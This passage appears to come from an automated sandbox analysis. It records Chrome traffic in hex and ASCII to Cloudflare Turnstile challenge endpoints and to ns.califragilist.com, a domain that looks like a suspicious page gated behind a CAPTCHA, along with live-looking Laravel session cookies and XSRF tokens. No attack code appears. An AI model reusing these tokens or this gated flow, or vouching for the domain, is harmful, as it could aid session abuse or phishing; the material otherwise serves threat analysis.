                                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:46 UTC16384OUTData Raw: 76 5f 38 64 65 36 34 34 63 65 39 62 35 37 34 35 66 36 3d 44 78 69 42 62 74 61 4d 6b 53 6b 57 6b 61 4b 61 35 67 41 67 4f 63 7a 74 67 4d 61 48 67 79 42 68 78 61 45 67 25 32 62 42 53 69 74 52 57 67 47 42 47 69 74 54 67 24 41 42 67 78 42 67 2d 69 67 44 42 69 6b 61 6c 74 68 42 67 5a 53 67 43 71 74 65 67 5a 2d 78 42 67 38 42 54 36 67 35 6b 6a 64 6a 6a 45 42 4f 69 53 67 74 64 62 4c 42 67 43 67 70 34 52 4d 59 73 69 31 76 24 6e 67 54 34 52 65 55 36 6b 31 6c 67 4c 64 64 73 39 36 67 44 6b 55 47 49 67 70 53 67 63 71 67 4f 76 6a 61 4f 58 66 78 47 67 74 4d 48 4d 47 30 6a 64 57 62 34 42 67 36 47 4d 69 74 6a 6b 44 36 30 47 73 62 66 2b 65 78 67 31 4c 75 76 61 42 74 47 34 4a 71 67 53 24 6e 30 74 39 59 52 50 69 57 64 42 7a 2d 59 64 6b 36 6c 6c 6d 41 54 6f 50 59 47 58 46 4f
                                                                                                                                              Data Ascii: v_8de644ce9b5745f6=DxiBbtaMkSkWkaKa5gAgOcztgMaHgyBhxaEg%2bBSitRWgGBGitTg$ABgxBg-igDBikalthBgZSgCqtegZ-xBg8BT6g5kjdjjEBOiSgtdbLBgCgp4RMYsi1v$ngT4ReU6k1lgLdds96gDkUGIgpSgcqgOvjaOXfxGgtMHMG0jdWb4Bg6GMitjkD60Gsbf+exg1LuvaBtG4JqgS$n0t9YRPiWdBz-Ydk6llmAToPYGXFO
                                                                                                                                              2024-11-06 15:55:46 UTC16384OUTData Raw: 69 5a 7a 7a 42 53 49 24 58 48 4a 67 4e 67 59 52 64 67 4c 67 31 65 31 6f 62 34 67 63 67 63 67 61 69 67 33 67 4d 42 63 69 67 4f 42 61 36 31 6b 61 41 6b 47 42 67 4b 67 45 69 4d 38 67 7a 67 73 67 4f 71 61 67 61 47 67 47 6a 6c 4b 61 4c 67 43 67 74 2b 42 51 67 67 71 54 7a 67 77 67 74 71 54 45 67 32 67 4f 42 63 69 61 72 67 79 42 54 74 36 6b 58 43 49 59 78 67 4f 42 4b 42 63 54 6b 42 42 74 59 74 79 51 6c 45 50 4c 61 42 67 54 6d 31 50 6c 4a 61 76 67 54 6b 70 69 67 36 67 57 70 24 58 55 54 42 31 49 6f 6f 51 34 67 70 49 6f 6a 61 53 67 4c 69 7a 2d 67 63 67 4c 42 61 69 61 72 67 76 4b 63 54 30 55 67 61 36 54 2d 67 73 67 6d 6f 77 42 31 61 67 7a 6a 70 7a 67 67 51 39 6a 61 4b 67 46 67 31 6a 67 4d 61 33 67 58 6a 70 71 31 48 67 79 67 50 50 61 32 67 50 4e 61 6e 67 63 67 79 74
                                                                                                                                              Data Ascii: iZzzBSI$XHJgNgYRdgLg1e1ob4gcgcgaig3gMBcigOBa61kaAkGBgKgEiM8gzgsgOqagaGgGjlKaLgCgt+BQggqTzgwgtqTEg2gOBciargyBTt6kXCIYxgOBKBcTkBBtYtyQlEPLaBgTm1PlJavgTkpig6gWp$XUTB1IooQ4gpIojaSgLiz-gcgLBaiargvKcT0Uga6T-gsgmowB1agzjpzggQ9jaKgFg1jgMa3gXjpq1HgygPPa2gPNangcgyt
                                                                                                                                              2024-11-06 15:55:46 UTC1301OUTData Raw: 74 36 61 39 6e 4e 75 57 69 2b 74 67 2b 66 68 53 67 6f 4a 64 30 47 61 72 50 6b 72 70 54 24 6e 2b 2b 24 6f 52 43 30 65 67 53 73 39 70 61 47 71 44 4c 68 75 50 38 71 78 6e 6b 38 6d 31 67 50 55 41 7a 61 37 62 59 75 44 69 67 6d 48 38 6f 71 42 4a 2b 69 73 6b 66 53 77 79 51 67 70 4f 68 61 52 4d 6b 43 6d 64 41 61 45 36 71 35 34 6f 45 76 6e 58 30 75 67 73 67 73 45 57 4f 2b 63 4c 38 42 47 68 6c 63 45 73 6a 63 45 61 6a 71 71 71 31 30 52 47 6a 38 30 41 30 6b 61 6e 37 36 7a 31 6d 76 75 6e 54 63 33 50 4a 57 58 67 74 45 65 70 44 42 78 67 67 73 4e 67 43 6a 63 6d 50 68 6e 55 42 31 55 38 34 71 4b 35 36 6c 67 52 52 57 79 53 7a 70 4d 67 35 24 4e 6d 76 32 34 55 58 6b 62 54 66 51 6b 69 61 2d 54 41 74 45 78 54 64 52 63 67 44 44 44 6e 67 5a 71 78 62 47 74 39 47 45 48 71 54 62 41
                                                                                                                                              Data Ascii: t6a9nNuWi+tg+fhSgoJd0GarPkrpT$n++$oRC0egSs9paGqDLhuP8qxnk8m1gPUAza7bYuDigmH8oqBJ+iskfSwyQgpOhaRMkCmdAaE6q54oEvnX0ugsgsEWO+cL8BGhlcEsjcEajqqq10RGj80A0kan76z1mvunTc3PJWXgtEepDBxggsNgCjcmPhnUB1U84qK56lgRRWySzpMg5$Nmv24UXkbTfQkia-TAtExTdRcgDDDngZqxbGt9GEHqTbA
                                                                                                                                              2024-11-06 15:55:46 UTC286INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:46 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Content-Length: 4552
                                                                                                                                              Connection: close
                                                                                                                                              cf-chl-out: Nn8OumpzPczEz1/T2g3FDxxoUhkZ4x8nOBcjeJd/G5tyYVR1fAxYIwrT+5xST4u+TDz0CcuQzo7tHXlOpBqvqgyPtfbmnqojihg8GEhvVjWZr9HwTEqk2rw=$CxJ8huGUO3SPxlk+
                                                                                                                                              2024-11-06 15:55:46 UTC1247INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 4d 71 59 4d 33 54 35 4d 2b 79 2f 79 7a 58 46 50 6e 67 43 70 4d 61 74 6c 41 6a 49 76 63 73 6b 51 35 67 67 34 34 4f 65 7a 6a 75 45 62 57 34 51 6f 5a 59 45 63 66 6b 6e 50 2b 35 72 59 6d 63 68 4b 4d 35 75 62 42 6c 33 78 67 75 65 64 2f 46 46 47 4d 38 48 71 68 71 6f 67 31 76 59 35 30 6e 6a 2f 35 49 32 46 51 4a 70 65 69 2b 39 58 2f 6a 4a 7a 6d 6b 50 2b 78 45 45 33 56 68 30 50 57 45 31 71 77 79 51 6f 4d 78 37 47 4b 35 6c 36 34 63 45 46 57 30 6b 55 39 31 4c 67 32 49 69 54 79 4a 58 6d 4c 78 70 42 75 41 51 4a 62 4c 62 47 42 51 64 51 4c 73 7a 53 2b 6b 43 7a 33 2b 4c 57 33 7a 75 68 49 58 43 77 49 77 37 45 6a 70 66 6c 72 6f 77 74 41 46 53 47 53 51 75 6a 47 6b 7a 6a 4a 65 51 75 44 6b 44 44 6b 4f 4d 5a 65 51 50 64 71 66 61 32 64
                                                                                                                                              Data Ascii: cf-chl-out-s: MqYM3T5M+y/yzXFPngCpMatlAjIvcskQ5gg44OezjuEbW4QoZYEcfknP+5rYmchKM5ubBl3xgued/FFGM8Hqhqog1vY50nj/5I2FQJpei+9X/jJzmkP+xEE3Vh0PWE1qwyQoMx7GK5l64cEFW0kU91Lg2IiTyJXmLxpBuAQJbLbGBQdQLszS+kCz3+LW3zuhIXCwIw7EjpflrowtAFSGSQujGkzjJeQuDkDDkOMZeQPdqfa2d
                                                                                                                                              2024-11-06 15:55:46 UTC1205INData Raw: 70 4a 65 32 77 37 6d 35 75 73 32 4f 70 72 72 50 6b 35 43 52 6c 5a 4f 53 6b 35 4f 58 79 63 37 56 6e 37 66 5a 30 71 2f 62 70 4c 50 6b 70 74 61 32 35 72 2f 6f 77 36 7a 72 73 63 6d 75 36 66 44 4e 31 4d 66 30 30 64 54 75 39 4c 7a 5a 75 4c 33 79 32 66 4c 4f 42 4d 2f 44 33 76 33 31 41 75 49 4f 2f 51 50 75 45 2b 45 47 30 68 54 74 37 4f 73 55 45 39 72 72 47 64 67 61 48 43 41 66 41 4f 51 67 41 41 58 78 4b 41 41 4b 4a 75 6f 44 37 2f 33 6f 43 42 45 47 4a 77 6b 54 4c 44 6f 4f 38 77 73 4a 48 6a 6f 34 51 45 49 32 41 55 41 66 41 42 6f 63 49 43 67 4e 42 53 4d 73 4a 6c 49 79 54 6b 42 55 55 7a 4d 36 4b 54 45 6e 54 46 6f 6f 57 53 77 66 4e 6a 78 52 4a 7a 70 63 50 30 4e 62 4f 6b 34 74 4a 31 39 53 50 47 38 30 64 56 46 79 51 6d 35 4c 57 58 74 6d 56 55 30 38 4f 54 56 57 59 44 31
                                                                                                                                              Data Ascii: pJe2w7m5us2OprrPk5CRlZOSk5OXyc7Vn7fZ0q/bpLPkpta25r/ow6zrscmu6fDN1Mf00dTu9LzZuL3y2fLOBM/D3v31AuIO/QPuE+EG0hTt7OsUE9rrGdgaHCAfAOQgAAXxKAAKJuoD7/3oCBEGJwkTLDoO8wsJHjo4QEI2AUAfABocICgNBSMsJlIyTkBUUzM6KTEnTFooWSwfNjxRJzpcP0NbOk4tJ19SPG80dVFyQm5LWXtmVU08OTVWYD1
                                                                                                                                              2024-11-06 15:55:46 UTC1369INData Raw: 45 4a 4d 4a 7a 35 52 55 45 49 6d 57 42 73 33 4e 54 70 53 46 79 35 56 52 45 4d 32 58 44 74 43 50 32 46 56 50 30 78 70 55 55 74 43 62 46 56 68 54 32 6c 67 59 6b 5a 59 54 32 56 78 66 44 63 36 61 33 52 39 62 58 64 39 58 46 65 47 5a 31 6c 62 6a 34 4a 74 58 34 36 47 69 6e 4f 44 6b 6e 52 4c 57 5a 46 39 6e 59 65 56 6c 31 4f 4c 6e 5a 31 76 5a 71 57 51 6d 59 4b 47 70 57 4e 34 6f 35 68 72 65 71 79 63 66 70 47 75 69 37 69 49 74 59 68 39 6c 37 4f 53 6b 70 75 66 72 62 6d 63 77 72 43 65 6d 4c 2f 44 68 70 37 4e 77 71 36 6f 77 72 57 6b 6e 73 32 35 71 38 6e 53 30 36 66 64 7a 37 48 5a 6e 74 57 33 73 2b 4c 68 34 4c 79 30 32 75 53 2f 37 75 6e 70 36 63 44 4f 73 50 48 71 36 2b 76 53 30 66 58 6b 78 39 66 79 75 37 37 79 2b 66 61 37 7a 2f 72 62 41 75 55 41 42 72 2f 4f 42 4d 7a 62
                                                                                                                                              Data Ascii: EJMJz5RUEImWBs3NTpSFy5VREM2XDtCP2FVP0xpUUtCbFVhT2lgYkZYT2VxfDc6a3R9bXd9XFeGZ1lbj4JtX46GinODknRLWZF9nYeVl1OLnZ1vZqWQmYKGpWN4o5hreqycfpGui7iItYh9l7OSkpufrbmcwrCemL/Dhp7Nwq6owrWkns25q8nS06fdz7HZntW3s+Lh4Ly02uS/7unp6cDOsPHq6+vS0fXkx9fyu77y+fa7z/rbAuUABr/OBMzb
                                                                                                                                              2024-11-06 15:55:46 UTC1369INData Raw: 46 44 4d 79 70 58 50 68 30 71 53 32 42 55 4f 69 31 43 4d 31 41 79 51 53 56 43 52 47 6c 6c 52 69 73 37 50 32 68 6d 4c 47 49 75 4c 7a 63 74 4d 6b 6c 49 53 46 64 36 51 6b 4a 4d 55 55 49 39 50 6e 4a 4b 50 59 6d 44 56 30 56 59 5a 56 75 4d 62 6c 47 45 55 4a 6d 4b 6b 59 64 75 69 47 70 30 6a 31 6d 6a 65 70 53 6c 6d 33 79 51 6c 61 61 6c 6f 6f 74 6e 71 4a 47 74 72 61 75 73 73 61 32 7a 72 6e 4b 79 69 59 36 78 6d 48 47 53 6a 6e 75 50 67 4a 75 2b 70 5a 79 4a 71 6f 4b 34 71 4b 66 51 70 71 4f 50 6b 6f 32 55 6f 63 43 52 31 4e 48 49 30 4e 54 64 7a 64 57 74 6f 72 37 57 75 2b 54 64 31 74 6e 58 79 38 54 4b 78 4d 37 45 79 39 72 4d 33 61 37 30 39 62 58 48 36 64 6e 64 37 62 33 62 74 2b 6e 66 2b 4c 2f 43 76 2f 6b 41 77 67 6e 70 39 51 72 49 44 2b 4c 4f 35 77 73 49 36 77 30 55 36
                                                                                                                                              Data Ascii: FDMypXPh0qS2BUOi1CM1AyQSVCRGllRis7P2hmLGIuLzctMklISFd6QkJMUUI9PnJKPYmDV0VYZVuMblGEUJmKkYduiGp0j1mjepSlm3yQlaalootnqJGtraussa2zrnKyiY6xmHGSjnuPgJu+pZyJqoK4qKfQpqOPko2UocCR1NHI0NTdzdWtor7Wu+Td1tnXy8TKxM7Ey9rM3a709bXH6dnd7b3bt+nf+L/Cv/kAwgnp9QrID+LO5wsI6w0U6
                                                                                                                                              2024-11-06 15:55:46 UTC609INData Raw: 49 53 54 70 63 49 55 31 58 57 46 45 66 4e 6b 5a 6a 4f 79 5a 69 5a 6b 39 48 5a 56 41 6e 4c 33 55 30 4b 33 4e 33 58 58 30 31 64 58 68 62 56 33 6c 56 68 59 4a 35 57 6c 74 71 66 45 4e 47 67 6d 75 4a 55 57 75 47 5a 6d 2b 47 64 58 6c 72 57 4a 61 4f 57 6c 6d 5a 62 5a 56 64 6b 6f 57 56 70 71 43 66 68 35 6d 70 66 47 61 62 71 4a 6d 4c 6d 71 36 55 5a 34 53 6f 6f 61 47 71 74 6f 32 74 66 62 32 52 6e 37 4f 2f 72 4d 47 69 75 37 43 43 70 72 32 31 76 4b 61 2f 6f 71 4b 67 78 35 4c 49 72 4d 36 70 32 62 6d 32 6d 5a 71 2f 30 70 65 64 76 64 66 63 72 39 62 62 30 4c 76 6c 34 62 2f 64 78 73 71 75 30 72 2f 6b 35 2f 58 6a 37 75 2f 51 77 76 43 34 32 74 50 76 30 2b 33 39 39 65 7a 31 34 2f 76 47 43 67 63 48 42 74 2f 6c 41 2b 54 6e 30 76 4c 68 35 77 51 4f 43 2f 72 30 45 68 58 32 39 76
                                                                                                                                              Data Ascii: ISTpcIU1XWFEfNkZjOyZiZk9HZVAnL3U0K3N3XX01dXhbV3lVhYJ5WltqfENGgmuJUWuGZm+GdXlrWJaOWlmZbZVdkoWVpqCfh5mpfGabqJmLmq6UZ4SooaGqto2tfb2Rn7O/rMGiu7CCpr21vKa/oqKgx5LIrM6p2bm2mZq/0pedvdfcr9bb0Lvl4b/dxsqu0r/k5/Xj7u/QwvC42tPv0+399ez14/vGCgcHBt/lA+Tn0vLh5wQOC/r0EhX29v


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              47192.168.2.1849796104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:47 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/985987479:1730906859:VmyJFIL_Fq-MDv0sVVlGF-GoqYDiNITe2QXZJkrSh1A/8de644ce9b5745f6/10XP31l6VDq4aRF.l1vMbr2zWTHPyEyeCAoXvvvIE4s-1730908536-1.1.1.1-Hrda3SJhqm_EvUItSZWiY949ZTsoMWuaNLstz2Q8bvDRQiF19YNK.kkAtQW9f0js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:47 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:47 GMT
                                                                                                                                              Content-Type: application/json
                                                                                                                                              Content-Length: 7
                                                                                                                                              Connection: close
                                                                                                                                              cf-chl-out: Z644eyuaiUoaJfZoVSiTluYcEb7EMRdoFRc=$LlyULDz+gQCr1JHf
                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645157f66e792-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:47 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                              Data Ascii: invalid


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              48192.168.2.1849798188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:47 UTC1439OUTPOST /cboOIeS9NKidIhE5DtVGZJdhr1AU8tkEd4AG7ei0Kkgcq HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Content-Length: 1629
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEkJDhKLNdfEs2hWZ
                                                                                                                                              Accept: */*
                                                                                                                                              Origin: https://ns.califragilist.com
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjhqSENYMSt1OXdLOXRZbGJzV1FqL3c9PSIsInZhbHVlIjoiaHk0N05sMlNZK1IySDVXRFdhVkZkRTczQjB6ZUU5bktEaE9mZDhNVHlNRlNMMk1ZdXgzOXZWOUQ1SU5OdW9xTlZ1ejA5bmhnMTlTVThINHp2b2xNL1ZIandRTFV1WEJWYkpEUndjOHQzcldKUXNLcGdPaDhxOUxrRVc3alRPcmQiLCJtYWMiOiI0YmQwNjlkNDY4OWI0MjIwYjVhMjI0Njc2MTZlNWE0NjkxZDExNTU0Mzk0ODc5MTlhZmNmNWQ5ZjAwY2Q5ZDBiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNPSmpMUGFpZzFkNnBoVDBJUER3OEE9PSIsInZhbHVlIjoiZW1nWGs4NWtOZG9oUm9vTC83bEx4eVFkaFZwZDdIQU1icGV1WTJvaHFtb2dQZWp5eWZWTHRrZ2dEQ2d4akl5Ny9nNlMyWHJsNW9WcmlEbUw0bXdPdE5DLzNNdnlLWmtyRkVSODE3UlBXdWE2cGZxYWRGWlhCMytqMStNSGx5Mi8iLCJtYWMiOiIyNzg5MTIxNTIwMWMxZDJhZWY3YTg0ODlhNWZkODdlYjIwMDdmOGNjMDA0NDBkNGYzYmZmM2M2NDExM2Y5ZjZmIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:47 UTC1629OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 45 6b 4a 44 68 4b 4c 4e 64 66 45 73 32 68 57 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 46 6c 39 41 52 47 65 65 2d 6a 4e 37 38 69 63 70 48 74 61 52 2d 4f 4b 46 50 71 58 37 5a 4a 5a 4b 78 62 39 35 54 64 59 35 4b 61 47 38 77 78 77 7a 5f 61 45 6d 51 41 74 6f 78 74 47 64 44 57 77 44 36 79 66 30 4d 56 52 34 6d 39 58 44 45 6d 38 71 67 6b 57 7a 66 50 37 73 4e 5f 58 32 49 39 49 73 42 77 4d 31 44 64 62 72 54 2d 69 7a 6d 43 78 77 70 6c 68 6c 49 76 4f 70 4b 55 34 30 71 75 77 46 48 69 5f 69 41 54 57 33 41 45 57 75 39 5f 65 31 4b 4c 72
                                                                                                                                              Data Ascii: ------WebKitFormBoundaryEkJDhKLNdfEs2hWZContent-Disposition: form-data; name="cf-turnstile-response"0.Fl9ARGee-jN78icpHtaR-OKFPqX7ZJZKxb95TdY5KaG8wxwz_aEmQAtoxtGdDWwD6yf0MVR4m9XDEm8qgkWzfP7sN_X2I9IsBwM1DdbrT-izmCxwplhlIvOpKU40quwFHi_iATW3AEWu9_e1KLr
                                                                                                                                              2024-11-06 15:55:52 UTC1182INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:52 GMT
                                                                                                                                              Content-Type: application/json
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Cache-Control: no-cache, private
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z%2FULkPdcJjsj30L3WkVfNZBWRvWEbDHvIIY5bTbJf5FzrzBnpBgwsRl6eUUJ21WUtGZNE8NZOXDMzeuJrsXkuFaFJnf9L4zfN0e99vcfaQKieWpqLRqZERxHZc3tvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3274&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2824&recv_bytes=3989&delivery_rate=874132&cwnd=233&unsent_bytes=0&cid=afde203a7733b552&ts=4061&x=0"
                                                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IjJaYUtuem1IWVZsTCtNTzU4QzJKWXc9PSIsInZhbHVlIjoiU01IU1N3ZFBvdkhuYlVnaHVDL2MzeG16VEk5RUtJS0ZFWWhIOW5GcnFOS2J1dHpvTHJ4S1R4YUo1OFN5aHZhTXl6VytzWjVCWlJORGg0RDNsNlMxdm9TQ1VGcXFVMUxhRUFwUkc3VmN2VWtMMGQxbTBsZjNWbm5kT2dkMkI0alIiLCJtYWMiOiJjYWY5NzNjYmQwYmQ0ZTRhMTRjYTljYTZlNjFjZGQ2MGUwZTVmYzFkYTBhZmFmMzc4YzU4NzBhZTg4NTgwMGQ4IiwidGFnIjoiIn0%3D; expires=Wed, 06-Nov-2024 17:55:52 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                                                                              2024-11-06 15:55:52 UTC731INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 6c 6a 64 30 68 33 61 55 67 77 4e 55 6b 31 4b 30 70 6b 4e 55 5a 4b 57 6e 5a 4b 51 6b 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 45 77 35 51 31 4e 4d 55 45 51 30 63 45 49 76 5a 44 4a 56 62 55 64 36 52 46 6c 69 53 54 42 48 61 6e 4a 32 61 54 56 31 57 54 49 7a 61 32 70 56 63 6b 52 78 4d 6e 6c 77 53 30 63 35 5a 30 31 53 52 32 64 4d 61 54 5a 4a 64 56 52 45 59 58 4a 68 5a 32 4e 70 62 32 6c 51 5a 33 64 47 4d 55 52 6c 65 58 5a 4d 4d 7a 5a 61 56 53 73 7a 64 6a 42 58 5a 6b 35 49 56 45 52 4b 52 58 41 72 5a 57 56 55 59 54 45 77 4e 6e 42 4a 54 57 68 30 63 79 74 54 51 31 56 76 52 6d 49 33 4b 32 68 4f 4b 79 74 4b 4e 31 64 76 59 58 64 79 53 32 34
                                                                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6Ikljd0h3aUgwNUk1K0pkNUZKWnZKQkE9PSIsInZhbHVlIjoiaEw5Q1NMUEQ0cEIvZDJVbUd6RFliSTBHanJ2aTV1WTIza2pVckRxMnlwS0c5Z01SR2dMaTZJdVREYXJhZ2Npb2lQZ3dGMURleXZMMzZaVSszdjBXZk5IVERKRXArZWVUYTEwNnBJTWh0cytTQ1VvRmI3K2hOKytKN1dvYXdyS24
                                                                                                                                              2024-11-06 15:55:52 UTC26INData Raw: 31 34 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 7d 0d 0a
                                                                                                                                              Data Ascii: 14{"status":"success"}
                                                                                                                                              2024-11-06 15:55:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              49192.168.2.1849807188.114.96.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:54 UTC1112OUTGET /cboOIeS9NKidIhE5DtVGZJdhr1AU8tkEd4AG7ei0Kkgcq HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjJaYUtuem1IWVZsTCtNTzU4QzJKWXc9PSIsInZhbHVlIjoiU01IU1N3ZFBvdkhuYlVnaHVDL2MzeG16VEk5RUtJS0ZFWWhIOW5GcnFOS2J1dHpvTHJ4S1R4YUo1OFN5aHZhTXl6VytzWjVCWlJORGg0RDNsNlMxdm9TQ1VGcXFVMUxhRUFwUkc3VmN2VWtMMGQxbTBsZjNWbm5kT2dkMkI0alIiLCJtYWMiOiJjYWY5NzNjYmQwYmQ0ZTRhMTRjYTljYTZlNjFjZGQ2MGUwZTVmYzFkYTBhZmFmMzc4YzU4NzBhZTg4NTgwMGQ4IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikljd0h3aUgwNUk1K0pkNUZKWnZKQkE9PSIsInZhbHVlIjoiaEw5Q1NMUEQ0cEIvZDJVbUd6RFliSTBHanJ2aTV1WTIza2pVckRxMnlwS0c5Z01SR2dMaTZJdVREYXJhZ2Npb2lQZ3dGMURleXZMMzZaVSszdjBXZk5IVERKRXArZWVUYTEwNnBJTWh0cytTQ1VvRmI3K2hOKytKN1dvYXdyS24iLCJtYWMiOiI4NTUyODc1MGVmMzBjOTM5NGQ1NTNjNGQwMDNiOGZiYjY0ZjZkNjU0NDZjNDEyZDViOTQxZWRhMmYyNDA4ZGQzIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:55 UTC976INHTTP/1.1 404 Not Found
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:55 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qFFVr271l2a9EeURYHzfk7ak8hcT9zYnYZhNYub4hdjg7WhZaYlcua9Gn3EYByJADDeKZyOF1QG7hXtj2NuoaWeb7%2BxzAoxtrvU2h8kjimcuZ4Y0od7xc0zWwHqqYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3498&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2032&delivery_rate=788671&cwnd=251&unsent_bytes=0&cid=382db266d51f68bb&ts=129&x=0"
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de645436ffb6c33-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1156&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1690&delivery_rate=2358306&cwnd=251&unsent_bytes=0&cid=526bd5aa033b531d&ts=1501&x=0"
                                                                                                                                              2024-11-06 15:55:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              50192.168.2.1849806188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:54 UTC1449OUTGET /7PXU/ HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Cache-Control: max-age=0
